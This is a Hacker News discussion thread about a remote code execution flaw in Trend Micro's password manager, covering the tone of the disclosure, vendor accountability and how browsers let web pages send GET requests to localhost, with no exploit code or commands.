In the Internet, you don't always note where the data comes from. I mean, software needs to do proper authentication.


>let's worry about that screw up after you get the remote code execution under control. Please confirm you understand this report.

This is an awful vulnerability and their immediate attempts at mitigation are sad but I feel like the Open Source community could do itself a lot of favors by avoiding this kind of tone. Not everyone working as a programmer is as good as you. Not everyone working as a programmer is any good. If you care about security here, why not concentrate on educating them. It's pretty likely the devs at any consumer hardware company aren't world-beaters; if we wanted that we would be willing to pay more than $100 for a router. It's also likely any large company has a chain of command these things have to go down through and back up again and for every link in that chain there's a greater than 0 chance the person has no idea about proper security. You may feel the security flaw is an obvious red flag that should have peoples' hair on fire but not everyone understands what you do.


> Not everyone working as a programmer is as good as you. Not everyone working as a programmer is any good.

sure. But then don't work on a security software suite. Or have bosses who properly code-review the commits.

During the time this vulnerability existed, machines running TrendMicro were infinitely less secure than machines not running the security software. This is severely wrong and IMHO warrants the very harsh tone.

This wasn't some obscure buffer overflow, sandbox escape vulnerability. This was running an RPC server over HTTP allowing full remote code execution over JSONp (or an <img> tag for that matter).


I agree with you with regards to the tone, but when your company description is "a global leader in internet content security software and cloud computing security with a focus on data security, virtualization, endpoint protection" (emphasis mine,) at some point somebody has to take some responsibility.


> but I feel like the Open Source community could do itself a lot of favors by avoiding this kind of tone.

To be accurate, that comment was from a security researcher at Google commenting on a closed-source software project. I agree that the tone of the comment was not beneficial, but I don't view it as being associated with or reflective of the open source community.


Not everybody has to catch those flaws. But if you are a security company and RELEASE that kind of crap, then it wasn't an instance of a poor guy new to security making a mistake, it is a catastrophic failure of your entire organization. Not properly fixing it means even after they were informed of the issue they weren't able to put people with the necessary skills on it. Which means either that the message didn't reach the appropriate people or that they don't employ enough of those. In both cases, you should not sell security products.

This is no small bug that was overlooked in a code review. The pure idea of several things in it is so crazy that even suggesting them is a massive red flag. Actually implementing it?!

If it goes through a chain of command, then ONE person realizing how bad this is should be enough.

(Also, what "Open Source community"?)


> If you care about security here, why not concentrate on educating them.

They are selling a security product. They are the ones that should already know these things.


To add on to this, by submitting the bug report, Tavis did not somehow magically become responsible for educating Trend Micro programmers about security.


1) This is Google, not the open source community.

2) If you are releasing a security product you don't understand, this is worse than not releasing anything. Normally I'm with you, but this is security. If you need to educate them, __they should not be releasing software__. This is downright irresponsible and harmful. It's like attaching velcro to a door, calling it a lock, and selling it as a competitor to ACTUAL LOCKSMITHS.


'If you are releasing a security product you don't understand, this is worse than not releasing anything.'

In a perfect world this would never happen...

However we do not live in that perfect world. Far from it.

The reality is all over the world and all of the time, software and a great many other things are designed and sold, and the person who 'knows how it all works' leaves.

New people are hired. Some are good, and some are not. People quit, get illnesses, even die, and life goes on.

When you solve ALL of those possible issues, then you can beat that drum all you want. Until then though, this comment is petty at best...


> When you solve ALL of those possible issues, then you can beat that drum all you want. Until then though, this comment is petty at best...

Would you say this in response to someone who harshly reprimanded the designer(s) and implementer(s) of the original Therac-25 control software? [0] If not, why not?

[0] https://en.wikipedia.org/wiki/Therac-25


Thanks for asking.

In the case of danger/damage to human lives a la direct physical injury, there should be a much higher standard.

It is why there exists murder in the first, second, or third degree; with very different punishments.

There is a 'minimum standard' that must always be followed.

I guess you will disagree, but to compare a programming design error in an antivirus product to the Therac incident falls outside normal deterministic logic, and would make actually my point. As someone who has made software for many years, it is not reasonable to expect a Therac or NASA level of diligence.

This is what courts have upheld as well.


> In the case of danger/damage to human lives a la direct physical injury, there should be a much higher standard.

Agreed. In some jurisdictions, people rely on security software to keep them from being identified, and then tortured and/or killed by their governments.

If a given piece of security software that claims to protect its users instead makes them substantially more vulnerable to attacks that would reveal information stored on their machines and/or permit the attacker to install arbitrary software of their own choosing, that is both a breach of trust and -in some jurisdictions- tantamount to handing that user over to the jurisdiction's Inquisitors.

> This is what courts have upheld as well.

Courts have repeatedly upheld that members of the American public don't have standing to challenge the NSA's dragnet domestic surveillance program. While the notion of standing has great value in helping to prevent groundless suits from wasting everyone's time and money, [0] it's pretty clear that the courts

* Are slow to adapt to rapid changes in the nature of the activities they're supposed to adjudicate

* _Often_ fail to be as infallible as they wish they were

While it may not be illegal to be an incompetent security software vendor in America, I -and many others [1] in the industry- think it's entirely reasonable to name, shame, and disparage companies that deem it acceptable to ship "security software" that contains vulnerabilities that anyone with a year of relevant experience [2] under their belt would be able to spot and fix.

> ...it is not reasonable to expect a Therac or NASA level of diligence.

While it would be ideal for security software companies to adopt avionics-software-style design and QA procedures, the errors found by Ormandy are things that would have been obvious to anyone with more than a year in the industry... It's obvious to anyone who reads that bug report that Trend Micro couldn't be arsed to do the industry-standard level of QA and have one of their mid-level guys spend a couple of hours reviewing this part of their consumer-level security software.

While Trend Micro might not be legally liable for it, that's still negligence.

[0] Yes. I'm very aware that court is expensive, slow, and often used as a cudgel against regular folks by people who have rather deep pockets. The requirement to prove standing likely prevents far more nuisance suits than it kills suits that should be heard and judged.

[1] Frankly, I hope that most folks in this business hold this opinion.

[2] In this case, web development experience.


> do itself a lot of favors by avoiding this kind of tone

Honestly, I'm impressed that Tavis keeps the tone as professional as he does. This vulnerability and the AVG one from last month (https://news.ycombinator.com/item?id=10803467) are both head-slappingly stupid, just entire features that are ill-conceived and poorly implemented, and from software companies that should know better.


I would agree with you if the software in question wasn't a pw manager. If you publish a software whose focus is security and show that you don't understand basic security issues then some direct words seem quite appropriate to me and the reaction from some [business] users might be much much harder.


Your points are valid if we're talking about a pull request on some amateur jQuery parallax effect plugin, not anti-virus software.


No. There's exactly 1 excuse for creating an API which exposes passwords and root execution: It's when it's secure to do it. And 0 excuse for the chain of command not understanding the product a company is building.

I'm not saying we should tell off support people when this happen. But they have to show solidarity with customers whose security and privacy was exposed by accepting coarse language when it's there.


You may feel the security flaw is an obvious red flag that should have peoples' hair on fire but not everyone understands what you do.

Horseshit. Having a publically-exposed HTTP endpoint that enables arbitrary code execution is so goddamn stupid that even an intern with room-temperature intelligence should've been like "Hey, isn't this a possible vulnerability?"

I'm all for the principle of charity, but if you are in a field where people are counting on you not to be a rank amateur then you better step up your game and not be surprised if they call you out on your incompetence.

I'll humor a kid who screws up carving a turkey--but if they claim to be a neurosurgeon, they damned well better have a steady hand.


Are you trying to say it was a mistake that allowed the unsigned, non origin checked decryption and upload of all passwords. It looks much more like that was how they designed it.

[IANA-Programmer FWIW]

Also how is an origin check a fix. Like, great, now only Trend Micro (and any impersonators via DNS poisoning or similar tricks presumably) can read all my passwords in plain text??

>It's also likely any large company has a chain of command these things have to go down through and back up again and for every link in that chain there's a greater than 0 chance the person has no idea about proper security. //

When the locks need changing in a school it doesn't matter that the headteacher has no idea how to fit a lock, nor what lock needs putting on which door; they have an employee who has some competency in the field (caretaker/janitor) sufficient to watch an outside expert (locksmith say) perform and certify the work. If the locksmith says "just paint the door with a brick pattern and don't bother with locks" then the janitor should realise that's not sufficient.

>It's pretty likely the devs at any consumer hardware company aren't world-beaters //

Trend Micro are a security software company, aren't they. From their website:

"As a global leader in IT security, Trend Micro develops innovative security solutions that make the world safe for businesses and consumers to exchange digital information. With over 25 years of security expertise, we’re recognized as the market leader in server security, cloud security, and small business content security."

Like come on. "Global leaders in IT security" can tell exposing remote code exploits across your entire install base is worth paying a not-rubbish programmer to get here ASAP and fix your product.


I think the tone is actually quite restrained given the situation.


> I feel like the Open Source community could do itself a lot of favors by avoiding this kind of tone.

As someone who regularly discloses vulnerabilities in open source software, I respectfully disagree with this statement. You are, of course, welcome to have your own opinion.


Not every engineer is top of the line, so when the bridge fails we aren't doing ourselves a lot of favors by adopting a harsh tone.

The truth is that technology has gotten to the point where poor security is lethal. From vehicles to medical devices, poor security can now allow a bad actor to put others into harms way.

Now, mistakes happen. No one is perfect. But we should demand the adoption of systems that do their best to minimize the potential damage of human mistakes.

Now, yelling at the construction worker because the bridge was poorly engineered is not at all effective. But the problem here isn't the tone, only that it need to be directed higher in the organization.


1/11 Trend Micro. Never forget! I can see how it can happen, I really do. Few code reviews back, I had to request a fix for a remote path traversal able to read any file on the system.

This is worse since TM is an AV vendor and probably has this deployed across so many desktops.


> This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.

Why is it visible already?


Because there is a broadly available patch. See eg https://googleonlinesecurity.blogspot.com/2015/02/feedback-a...


because it's "fixed"


Can anyone explain why a security product needs a local HTTP server, or why it needs endpoints at all, let alone 70?

WTF it would have components written in Node or JavaScript?


in regards to your second question: Why wouldn't you write components in a modern, generally well-sandboxed safe language? (Of course you shouldn't break the sandbox to do so, but using JS in general is not a bad thing)


I guess my (potentially old-school) thinking is that for something that needs to be a solid as a security layer, integrated with the OS, I would only consider memory and type-safe languages.


Type unsafety of js can lead to exceptions, not buffer overflows.


This seems to be a relatively stand-alone app, not connected to the main scanning engine.

And I'd say they probably use C or C++ for most other things, which isn't exactly safer.


Why do browsers let websites send AJAX requests to localhost anyway? I feel like that's bound to cause trouble.


Arbitrary requests to localhost aren't permitted, unless the page itself is on localhost. (Just as evil.com can't make arbitrary requests to google.com.) That said, there's a bunch of exceptions. They don't really matter here: the bug reported showed than an exploit was possible with a GET request, and you don't need AJAX to make a GET request. A <script> or an <img> tag is, under the hood, a GET request. Taking the second case (making a GET request through an <img> tag), the response likely won't be an image, so it won't display, but we don't know that until long after the request has executed, so it's too late.

You'd have to restrict where images can come from (people wouldn't be able to use CDNs?), where scripts come from (a lot of sites load jQuery from Google), you couldn't allow JS redirects. You'd have to forbid JS from automatically submitting <forms>. CSS on odd domains. Webfonts. Videos, audio. I'm sure there are things I'm missing.

Back on the AJAX side of things, JS can make GET requests through AJAX. The server has to send back a special header for the script to get the response, but if it doesn't, the request is still executed. (The idea being that, since you can execute GET requests using any of the aforementioned methods, allowing JS to do it isn't going to allow anything new. GET also isn't supposed to have side effects like this buggy endpoint has … GET was an extremely poor choice here.)

More arbitrary requests are permitted, but only under the condition explicitly allows them with what is called a preflight request. (Note that GET isn't the only exception to preflighting, see [1].)

[1]: https://developer.mozilla.org/en-US/docs/Web/HTTP/Access_con...


Yeah, I forgot about the exceptions to the Same Origin Policy for a moment there.

Still, I don't see why sites should ever be able to make any request to localhost.


It shouldn't cause a problem unless malicious software is already installed on the user's machine.


It's pretty standard when you're developing a web application. Your backend runs on your machine, your frontend requests stuff from within the browser.


Sure, but why can external sites access localhost?


They external sites don't access it, they just ask the browser to load an image. So the external site can't read the result, but that's not actually stopping them from owning your machine.


Seems useful for any kind of local web development for one, plus there are lots of consumer applications that run locally as a web app, like Plex, for instance.


Sure, for local web dev and apps. But why can websites on the Internet make requests to localhost?


I'm lost for words...


It's "enterprise"!


Jesus Christ on ten motorbikes!


Jesus Christ on ten motorbikes.


What could possibly go wrong?


I'm kind of surprised that their reaction is to expect Tavis to continue to volunteer his time to audit the security of their product.


They're asking him to help verify the fix since he's in the best position to do so, having caught the bug. I think this is better than them saying "thanks, we'll take it from here, bye"


Asking the reporter to check the fix is standard behaviour in my experience, and what I would expect as reporter.


Someone isn't understanding where to escalate this, maybe because of the working conditions at Trend Micro suggest that some low level developer would be blamed for this. It's definitely not a developer's fault this isn't audited, and probably not even the product's manager.

Seriously the CIO should be fired for this. It's really that unacceptable. It's not just one attack surface exposed by this.


They asked nicely. And they don't seem to be able to tell if they've fixed it, so they really have no choice but to beg.


This, by the way, is a new normal. Organizations, teams and individuals within an organization, especially its buoracracy have self-preservation and keeping their status in mind rather than any engineering discipline, leave alone craftsmanship. Such is the nature of any bloated social formation, be it government, church, army or corporation.

The very first person who suggested Node http server must be fired that very day for offensive incompetence. I could hardly imagine any more satirical example. Hypervisor in Java, perhaps.

But idiots are bullshitting another idiots (PHP, Mongo, Node, Hadoop - you name it) whose only concern is to convince those one step higher in the hierarchy that they are still worth keeping, so any bizzare mix of trending [among idiots] memes would do.

Hey, Bivis, Node is cool, huh huh. Single-threaded callback hell in a language with implicit coersion, without standard module system (leave alone versioning) as a yet another useless layer of complexity to utilize lots of man-hours for o e more year? Lol wut? Node is cool.

So, all this is rather normal.


>I could hardly imagine any more satirical example. Hypervisor in Java, perhaps

Nice imaginative example - hypervisor in Java. I almost get a panic attack launching Eclipse and then having to wait for it to appear. Contrast that with Chrome/FF launching with umpteen no. of tabs or a SublimeText. Clearly lots of people routinely get it wrong, in technology choice.


So what technologies do you actually like for writing web servers?

I think this comment is a good example of "contempt culture," which we've probably all been guilty of, and which we should do less.

http://blog.aurynn.com/86/contempt-culture


Considerable amount of intelligence is required to understand that nginx, due to its design choices and attention to implementation details (which are hallmarks of truly remarkable systems, such as Plan9/Inferno, Erlang, Smalltalk, etc) is more portable than Node (it runs on more architectures, including Windows) require order of magnitude less resources providing close to optimal effeciecy, could be easily extended via modules and scripted in Lua with less lines of code, less pain, less nonsense.

BTW, contempt to incompetence or corruption is natural and healthy emotion. It is what contempt has been evolved for.


> The very first person who suggested Node http server must be fired that very day for offensive incompetence.

I'm suspicious that it was an MBA who wanted to use cheaper JS developers on the project.


The funny part is how the TrendMicro guys keep asking Travis to validate their fix - as if he's their tech support guy.


This is why I don't like installing free AV or paid AV or doing anything other but burning my computer and living in the woods.




Consider applying for YC's Spring batch! Applications are open till Feb 11.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: